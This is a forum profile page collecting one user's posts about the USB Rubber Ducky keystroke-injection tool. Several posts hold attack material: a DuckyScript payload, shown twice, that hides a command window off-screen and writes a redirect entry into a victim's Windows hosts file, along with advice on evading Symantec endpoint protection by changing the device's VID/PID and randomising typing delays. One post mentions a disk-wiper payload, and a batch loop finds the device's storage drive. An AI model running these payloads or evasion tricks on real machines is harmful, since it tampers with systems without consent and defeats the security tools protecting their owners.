overwraith
-
Posts
742 -
Joined
-
Last visited
-
Days Won
5
Posts posted by overwraith
-
-
Thanks for all the responses; they'll definitely guide me towards what I need =).
The process itself wouldn't need to be uniform on all OS's; I'm mostly just looking
for the easiest way to get the file on the computer and execute it.
By chance, is it possible to have the .jar on the microSD card itself and have the
ducky retreive it? I'm guessing no, but I thought I'd ask.
You need to flash your duck with specialized firmware that midnightsnake has made. I think Twin Duck will work. It is now possible to have composite HID/Mass storage devices.
-
As far as executing the jar file, there is probably no uniform way to navigate to each OS's command prompt that is the same for all of them. The number of scripts required to execute on different OS's can be minimized however by sticking to key sequences that are common to subsequent versions of the OS. For instance, one can probably make a script that works on Windows XP, and Vista, and Windows 7, but not Linux. Also, one can probably make one script that works on all or many flavors of Linux. I foresee 3 end scripts, one for Windows, one for Linux, and one for OS X. Twin duck can probably hold all the JRE files necessary. Portable apps may even have some form of portable JRE software. It may be worth it to look online for any kind of silent install procedure as well. I know that Python has a silent install.
-
The JPG is hilarious. ROFL!!!
-
If you do preemptive stuff to avert anti virus they find our tricks faster
ok.
-
Never mind, I answered my own question. According to google, there is no female USB to bluetooth connector, because the connector would have to be able to convert the keyboard traffic into bluetooth traffic. It would be really cool though if the USB rubber ducky could be made to use bluetooth, for a more remote attack. Ex. wait for the victim to login, then press a button on the ducky to trigger the payload. I have no idea if it would work, and no Idea if there is any kind of setup procedure for bluetooth keyboards that would prevent this type of thing.
-
I am curious, are there any Bluetooth devices that act like a USB extension chord that can be used with the USB Rubber ducky? Additionally can the connectors be swapped out in case I have to leave a bluetooth connector behind.
-
I just tried the VID/PID change on the Semantec endpoint protection, and I can verify that the change does work. Are there any other ways the antivirus companies can block us, so we can get ahead of the curve in preventing the antivirus companies from blocking us?
-If they take into account the speed at which we type the payloads, we can create bash scripts to randomize the delay values between commands or even letters. Could even modify the duck script language to do it automatically.
-
Apparently Semantec endpoint protection can block USB Rubber Ducky attacks, will changing the VID/PID number circumvent this blocking, or is a more creative solution required?
-
If you use windows, a good way to get the functionality of the linux exe's (As used to generate the pin cracking duck script) is to use CYGWIN, or some related tool.
-
Just remember to label the sdcard to "DUCKY" for this to work.....
their not labelled by default (if they are its usually some pseudo-random code eg "23AF-3DDE")
But it is much better than looking for a file that does nothing on the root of the drive.
-
Midnight snake showed me an improvement to the command line drive finding code;
J:\>for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d J:\>echo %myd% J:This was part of what one of his firmware versions would automatically type in. So instead of using my for loop, we can use this loop which looks for a volume labeled "DUCKY". This means we don't need the text file on the root of the drive anymore.
-
Thanks, batch wiper payload now available on Git hub. If this payload causes any legal problems in the future we can remove it from Git hub.
-
Excellent explanation, now I have a new problem. The payload that I tried to copy and paste onto the page appears all run together with no newlines. How do I make a code box on the page?
-
Does anyone know how to make a new payload page on the USB Rubber Ducky Git Hub page? I keep trying to upload a couple of the payloads I made, and cant seem to figure out how it works.
-
Is the jar file in the same directory as the directory you are running the command from? The file either has to be in the same directory that you are using it, or you need to put the full path before the encoder name.
Try the following first: java -jar encoder /?
I think this will fix your problem: java -jar J:\folderName\encoder.jar -i inputFile -o outputFile
A way to get around this is to put the encoder someplace like on your system drive's root, and add the encoder's file to the system path.
-
I have a couple of ideas. The duck would be a great delivery tool. Got a script for windows mostly written. should post in a day or two after I test.
Great question, really got me thinking.
I didn't know where to start. I look forward to your take on the subject.
-
The webpage (http://www.usbrubberducky.com) should be fixed eventually, as are most things on the internet.
First watch the Quack Start video here:
http://hakshop.myshopify.com/products/usb-rubber-ducky
Then read through the Duck Script Syntax here:
http://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript
Then Read through a few payloads here (only execute them if you know what they're doing):
http://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
Then search through the forums here, I'm sure there's something on getting started here somewhere.
To compile a duckscript use the following command line syntax in the command line:
java -jar encoder.jar -i E:\folder\inputFile.txt -o E:\inject.bin
Someday you will want to learn about flashing, midnitesnake is the person to see about that. You can send him a message using the forum tools at the top of the screen.
I'm sure other people will have good advice too...
-
Wouldn't have been the first place I would have looked either, point taken.
-
Yes but the delays be necessary on your victims system.
REM Author:ashbreeze96 and overwraith
CONTROL ESCAPE
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 50
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
DELAY 50
STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
STRING exit
ENTER
-
What does CTRL+SHIFT+ENTER do?
Additionally further down the forum at this link http://forums.hak5.org/index.php?/topic/28463-the-duck-and-the-rick-role/
we made some additional modifications to a script that does essentially the same thing. Some of the noteworthy improvements include using GUI R instead of CONTROL ESC to allow this operate on non-vista/win7 devices. I think we also added a newline so we don't append to the end of the current line, and we also used a snippet that hides the command window below the bottom of the screen.
REM Author:ashbreeze96 and overwraith GUI R STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS ENTER STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS ENTER STRING exit ENTER
The delays in the forum post at the designated forum had a lot of delays that aren't usually necessary on my system.
-
Well, its good to know, thank you.
-
Some software security flaws are generated by lazy coding practices though. Nearly all hacks prey on coding flaws. A buffer overflow (most prevalent in C and C++ languages) for instance is a case where a coder has neglected to check the length of a users input to the program. The data is written without checking whether or not it will overwrite things after the allocated buffer space, thus rewriting a return address after the buffer. If input is cleverly crafted, a buffer overflow situation can be used to run code that the programmer of the victim program didn't code. This is done by injecting shellcode into the buffer, and a return address which is written after the buffer to point back into the buffer, thus redirecting the flow of execution. I think java is probably written in C/C++ or something, as all our computer languages have a hierarchy of evolution. Machine code was first, then came Assembly, and then came compiled languages, which are sometimes used to write more complex compiled languages. Improper verification is also the cause of several more modern types of attacks including cross site scripting, SQL Injection, and XML injection. It can be difficult to catch all coding flaws before release, because of the sheer size of the source code. Programs can be hundreds to thousands of lines. Format String Exploits, also prevalent in C and C++ are also an error associated with incorrect input verification. Format String Exploits involve allowing the user to input '%' symbols into a printf format string.
-
That's the enthusiasm I'm talking about!!!
-
I had a good Idea a while ago, would it be possible to make a USB rubber ducky firmware variant that has mass storage support, but write protects the mass storage? This would be good if somebody wanted to insulate their hack tools from antivirus software. Perhaps if the executable files are discoverable by one antivirus brand, but not another, and you don't know which antivirus software you are facing in the field.
[Question] Is it possible to execute jar/scripts/exe files?
in Classic USB Rubber Ducky
Posted
There is a problem I foresee you having though. The USB mass storage part does not show up for a while, so you may end up having to make a batch loop which waits for the USB mass storage to mount. The following code I made on the fly, so it probably wont work, but will show you more or less what to do to get this working.
:while1 for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d if Exist %myd% ( goto break ) goto while1 :break REM Continue script.